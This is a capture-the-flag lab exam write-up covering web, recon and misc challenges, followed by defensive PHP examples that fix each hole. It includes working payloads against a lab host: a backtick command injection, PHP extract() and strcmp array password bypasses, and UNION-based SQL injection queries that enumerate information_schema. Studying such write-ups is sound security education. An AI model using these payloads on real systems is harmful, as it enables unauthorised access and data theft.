# 【Final】Lab exam write-up

## `Web`

* ### HW-eval
  > ![](https://i.imgur.com/mAv8Waz.png)
  > * From the code: `strpos` returns the position of the first `"` or `'` in the variable, and `die` stops the whole page script and outputs the string (or function result) passed to it.
  > * So I put `"` as the very first character, which makes `strpos` return 0 (treated as false by the check), then use `.` to concatenate strings and run the `ls` command through the GET parameter as follows.
  > * The directory contains two files, ffff11111113g.php and index.php.
  > http://140.134.25.138:24004/?cat=".`ls .` . "
  > ![](https://i.imgur.com/asFfRV8.png)

* ### HW-extract
  > ![](https://i.imgur.com/XKMmL5X.png)
  > ![](https://i.imgur.com/ESVuuRS.png)
  > * Doing it this way failed at first.
  > ![](https://i.imgur.com/tLkRz04.png)
  > * Then I went to another site to encrypt (hash) it.
  > ![](https://i.imgur.com/iArU4nl.png)
  > * That was wrong too; it turned out that I had to supply my own matching pair of pre- and post-encryption values.
  > * So I typed an arbitrary password, encrypted it, and that worked.
  > ![](https://i.imgur.com/1EXLOb1.png)
  > ![](https://i.imgur.com/qY9CBWq.png)
  > * http://140.134.25.138:24010/index.php?password=a&pass=86f7e437faa5a7fce15d1ddcb9eaeaea377667b8

  ![](https://i.imgur.com/8R9r5c9.png)
  ![](https://i.imgur.com/dQDJa4E.png)

* ### HW-Bypass II
  > ![](https://i.imgur.com/z8ovTkb.png)
  > ![](https://i.imgur.com/rZ52Fx8.png)

* ### 這題真的很簡單 (This one is really easy)
  > ![](https://i.imgur.com/fqmnOce.png)

* ### Fake IP++
  > ![](https://i.imgur.com/BG1TIpu.png)
  > * Changed the IP and Host to 127.0.0.1, using a Chrome extension to modify them.
  > ![](https://i.imgur.com/iw1qIMU.png)
  > ![](https://i.imgur.com/Ev85O7w.png)

* ### 伍佰
  > ![](https://i.imgur.com/3X9HE6X.png)
  > ![](https://i.imgur.com/4I5NJfb.png)
  > ![](https://i.imgur.com/w1GRB0I.png)

* ### Give me more MAGIC
  > ![](https://i.imgur.com/zdowbvK.png)
  > ![](https://i.imgur.com/o4S2AwL.png)
  > * https://www.doyler.net/security-not-included/bypassing-php-strcmp-abctf2016
  > * http://140.134.25.138:24009/index.php?password[]=%22%22

* ### Version v5
  > ![](https://i.imgur.com/GD5Al56.png)
  > * Used the gitleaks tool and found the CTF flag.

* ### HW-UnionBase
  > ![](https://i.imgur.com/IYofZbD.png)
  > * First find the database:
  > * `' union select 'a','a', schema_name FROM information_schema.schemata;#`
  > ![](https://i.imgur.com/oRerUuh.png)
  > * Then find the table:
  > * `' union select 'a','a', table_name from information_schema.tables where table_schema = 'ctf';`
  > ![](https://i.imgur.com/FQMmKYE.png)
  > * Then find the column:
  > * `' union select 'a','a', column_name FROM information_schema.columns WHERE table_name = 'ctfffff';`
  > ![](https://i.imgur.com/2A1LWou.png)
  > * Then find the flag:
  > * `' union select 'a','a', flagggggggggggg from ctfffff ;`
  > ![](https://i.imgur.com/xt1iuYQ.png)

* ### eval++
  > ![](https://i.imgur.com/qeUqSVM.png)
  > ![](https://i.imgur.com/Q8q9mYy.png)
  > ![](https://i.imgur.com/7gKUysy.png)

* ### 3C 達人 T1m 戈 ++
  > * IP injection
  > ![](https://i.imgur.com/20EdN4n.png)
  > ![](https://i.imgur.com/eDEbXtN.png)
  > ![](https://i.imgur.com/XV1DGhv.png)
  > ![](https://i.imgur.com/HP8qWa5.png)

* ### MAGIC
  > ![](https://i.imgur.com/QBIldzW.png)

* ### 3C 達人 T1m 戈
  > ![](https://i.imgur.com/20EdN4n.png)
  > ![](https://i.imgur.com/eDEbXtN.png)
  > ![](https://i.imgur.com/XV1DGhv.png)
  > ![](https://i.imgur.com/HP8qWa5.png)

* ### SESSION
  > ![](https://i.imgur.com/m5l54kX.png)

* ### Simple Login
  > ![](https://i.imgur.com/D9xe9da.png)
  > ![](https://i.imgur.com/J9yaSVM.png)

* ### 五卍
  > ![](https://i.imgur.com/XFUsoaX.png)
  > ![](https://i.imgur.com/1DLx48k.png)

## `Recon`

* ### Blasting
  > ![](https://i.imgur.com/80Uww9B.png)
  > ![](https://i.imgur.com/LnOrTgE.png)
  > ![](https://i.imgur.com/E8rlfWO.png)
  > ![](https://i.imgur.com/FAPAJVT.png)

* ### 這題真的很好玩! (This one is really fun!)
  > ![](https://i.imgur.com/vCcZHQ0.png)
  > ![](https://i.imgur.com/yzH8CUT.png)

* ### HTTP / HTTPS
  > ![](https://i.imgur.com/511VcBs.png)
  > * Searched for subdomains on https://crt.sh/ with `%.tabby.tw`.
  > ![](https://i.imgur.com/xEDVpQU.png)
  > * https://iegwxztmmrtleqonqgzc.tabby.tw/
  > ![](https://i.imgur.com/gcvLjvz.png)

## `Misc`

* ### Welcome!
  > * Free points.

* ### meme Cat
  > ![](https://i.imgur.com/pYlpDiC.png)

* ### Info In S0mething
  > ![](https://i.imgur.com/Z993BvG.png)
  > * The QR code is the flag.

* ### Be ADMIN
  > * It is a Ruby file. I tried netcat, but nothing I entered had any effect. I noticed stdin is used, so it may be possible to do something with the input to get into a shell and read the source code.
  > ![](https://i.imgur.com/8o2JpDh.png)
  > ![](https://i.imgur.com/XikFA2u.png)
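The HW-eval challenge above falls because its filter relies on `strpos`: when the quote is the very first character, `strpos` returns `0`, which a bare `if (strpos(...))` treats as "not found", and whatever the parameter contains then reaches a shell. The following is an added example, not the challenge's own source, showing how the same `cat=<file>` handler is hardened: the parameter is matched against an allowlist and resolved inside a fixed directory, and the file is read by PHP directly, so no user-controlled text ever reaches a shell. `CONTENT_DIR`, the `.txt` naming rule and `resolveRequestedFile()` are assumptions for the example.

```php
<?php
// Added example (not the challenge's own code): hardened version of a
// "?cat=<file>" page whose original check used strpos() to reject quotes.
// The weak shape looked roughly like:
//     if (strpos($cat, '"') || strpos($cat, "'")) die('no quotes');
//     echo shell_exec("cat " . $cat);
// strpos() returns 0 for a quote in position 0, and 0 is falsy, so the guard
// lets that input through. The fix below does not try to filter characters:
// it validates against an allowlist, resolves the path inside one directory,
// and never calls a shell at all.

declare(strict_types=1);

// Hypothetical directory holding the only files the page may display.
const CONTENT_DIR = __DIR__ . '/content';

/**
 * Return the absolute path of an allowed file, or null if the request is invalid.
 */
function resolveRequestedFile(string $cat): ?string
{
    // 1. Syntactic allowlist: plain basename, fixed extension, no separators,
    //    no shell metacharacters, bounded length.
    if (preg_match('/\A[A-Za-z0-9_-]{1,64}\.txt\z/', $cat) !== 1) {
        return null;
    }

    // 2. Semantic allowlist: the resolved path must still sit inside
    //    CONTENT_DIR, which rules out anything a symlink could smuggle in.
    $base = realpath(CONTENT_DIR);
    $real = realpath(CONTENT_DIR . '/' . $cat);
    if ($base === false || $real === false) {
        return null;
    }
    if (strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $real;
}

$cat = $_GET['cat'] ?? '';
// ?cat[]=x would arrive as an array; reject anything that is not a string
// before it reaches a typed function (strict_types would otherwise throw).
if (!is_string($cat)) {
    http_response_code(400);
    exit('bad request');
}

$path = resolveRequestedFile($cat);
if ($path === null) {
    http_response_code(404);
    exit('not found');
}

// Serve the file with PHP's own I/O instead of shelling out to `cat`.
header('Content-Type: text/plain; charset=utf-8');
readfile($path);
```

Two properties make this robust regardless of what the quote filter missed: the regex only admits a closed set of names (so backticks, `$(...)`, `;` and friends are rejected rather than enumerated), and the handler never invokes a shell, so even a future bug in the allowlist cannot turn into command execution. The `realpath` prefix check is what the regex cannot give you on its own; keep both.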
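HW-extract and Give me more MAGIC both defeat a password check through PHP's input handling rather than through the hash: `extract($_GET)` lets the client overwrite whatever variable the submitted password is compared against (which is why a self-chosen `password`/`pass` pair with `pass = sha1(password)` works), and `strcmp()` handed an array via `password[]=` returns `NULL` with a warning on PHP 7, and `NULL == 0` is true. The block below is an added example, not the challenge's code, showing the check written so that neither trick applies: only a string is accepted, request data is never extracted into scope, and the comparison is `password_verify()` against a stored `password_hash()` value. The `storedPasswordHash()` helper and its placeholder secret are assumptions.

```php
<?php
// Added example (not the challenge's own code): a password check that is
// immune to the two PHP pitfalls in the HW-extract and Give me more MAGIC
// write-ups.
//   * No extract($_GET): the stored hash cannot be overwritten by a request
//     field, so the client cannot ship its own (password, sha1(password)) pair.
//   * No strcmp() on raw input: an array in password[] is rejected up front
//     instead of being juggled into a NULL == 0 "match".

declare(strict_types=1);

/**
 * Hypothetical stored credential. In a real application this comes from the
 * user store and is produced by password_hash() at registration time; it must
 * never be derived from the incoming request.
 */
function storedPasswordHash(): string
{
    static $hash = null;
    if ($hash === null) {
        $hash = password_hash('placeholder-secret', PASSWORD_DEFAULT); // placeholder
    }
    return $hash;
}

/**
 * Validate the request and verify the password. $request is the decoded
 * query/body array (e.g. $_GET or $_POST); only the 'password' key is used.
 */
function checkPassword(array $request): bool
{
    $password = $request['password'] ?? null;

    // Reject arrays, numbers, null and oversized input before any comparison.
    if (!is_string($password) || $password === '' || strlen($password) > 1024) {
        return false;
    }

    // password_verify() performs a constant-time comparison against the
    // stored hash; extra request fields such as 'pass' or 'hash' are ignored.
    return password_verify($password, storedPasswordHash());
}

// Constructed inputs mirroring the two bypass shapes from the write-up.
$cases = [
    'array in password[]'      => ['password' => ['']],
    'client-supplied hash'     => ['password' => 'a', 'pass' => sha1('a')],
    'wrong string'             => ['password' => 'guess'],
    'correct placeholder'      => ['password' => 'placeholder-secret'],
];

foreach ($cases as $label => $request) {
    printf("%-22s => %s\n", $label, checkPassword($request) ? 'accepted' : 'rejected');
}
```

The first two cases are rejected and only the last is accepted. If the code base cannot move off `strcmp()`/`sha1()` immediately, the minimum fix is still the `is_string()` guard plus `hash_equals()` for the comparison, and removing `extract()` on any superglobal; on PHP 8 the array case throws a `TypeError` instead of returning `NULL`, which is safer but still a 500 rather than a clean 400.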
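The HW-UnionBase steps work because the search term is spliced into the SQL text of a three-column query, so a `UNION` that supplies three values of its own is executed as part of the statement and `information_schema` answers for whatever the database account can see. As an added example, not the challenge's code, the search below binds the term as a parameter so the server receives it as data, never as syntax; the `items` table, its columns, the DSN and the account name are assumptions, while `ctf`, `ctfffff` and `flagggggggggggg` in the comments are the names the write-up discovered.

```php
<?php
// Added example (not the challenge's own code): a search endpoint that keeps
// user input out of the SQL text. The vulnerable shape behind HW-UnionBase is
// roughly:
//     $sql = "SELECT id, name, price FROM items WHERE name LIKE '%" . $q . "%'";
// A closing quote plus UNION SELECT in $q then becomes part of the statement,
// which is how the write-up walked information_schema.schemata -> tables
// (ctf) -> columns (ctfffff) -> the flagggggggggggg column.

declare(strict_types=1);

function connect(): PDO
{
    // Hypothetical DSN and credentials. Use a least-privilege account: in
    // MySQL, information_schema only lists objects the account has some
    // privilege on, so a read-only user scoped to one schema exposes far less
    // if an injection is ever found elsewhere.
    return new PDO(
        'mysql:host=127.0.0.1;dbname=app;charset=utf8mb4',
        'app_ro',
        'placeholder-password',
        [
            PDO::ATTR_ERRMODE            => PDO::ERRMODE_EXCEPTION,
            PDO::ATTR_EMULATE_PREPARES   => false, // server-side prepares, not client-side quoting
            PDO::ATTR_DEFAULT_FETCH_MODE => PDO::FETCH_ASSOC,
        ]
    );
}

/**
 * Search items by name. $term is bound as a value, so quotes, UNION, comments
 * or semicolons inside it are matched literally rather than parsed.
 */
function searchItems(PDO $pdo, string $term): array
{
    // LIKE wildcards are not injection, but escape them so a user cannot turn
    // the search into "match everything" with a bare '%'.
    $pattern = '%' . addcslashes($term, '%_\\') . '%';

    $stmt = $pdo->prepare(
        'SELECT id, name, price FROM items WHERE name LIKE :pattern LIMIT 50'
    );
    $stmt->bindValue(':pattern', $pattern, PDO::PARAM_STR);
    $stmt->execute();
    return $stmt->fetchAll();
}

$term = $_GET['q'] ?? '';
// ?q[]=x arrives as an array; refuse it instead of letting PHP stringify it.
if (!is_string($term) || strlen($term) > 200) {
    http_response_code(400);
    exit('bad request');
}

try {
    foreach (searchItems(connect(), $term) as $row) {
        // Output encoding keeps a stored value from becoming script in the page.
        echo htmlspecialchars((string) $row['name'], ENT_QUOTES, 'UTF-8'), "\n";
    }
} catch (PDOException $e) {
    // Log the detail server-side; do not echo driver errors to the client,
    // as those messages are what make error-based injection easy to tune.
    error_log($e->getMessage());
    http_response_code(500);
    exit('search failed');
}
```

The column count of the original query is what made the three-value `UNION` line up; with a bound parameter that count is irrelevant because the term can no longer terminate the string literal. The `EMULATE_PREPARES => false` option matters too: with emulation on, PDO quotes values client-side, which is still safe when the charset is set correctly in the DSN, but a true server-side prepare removes that dependency entirely.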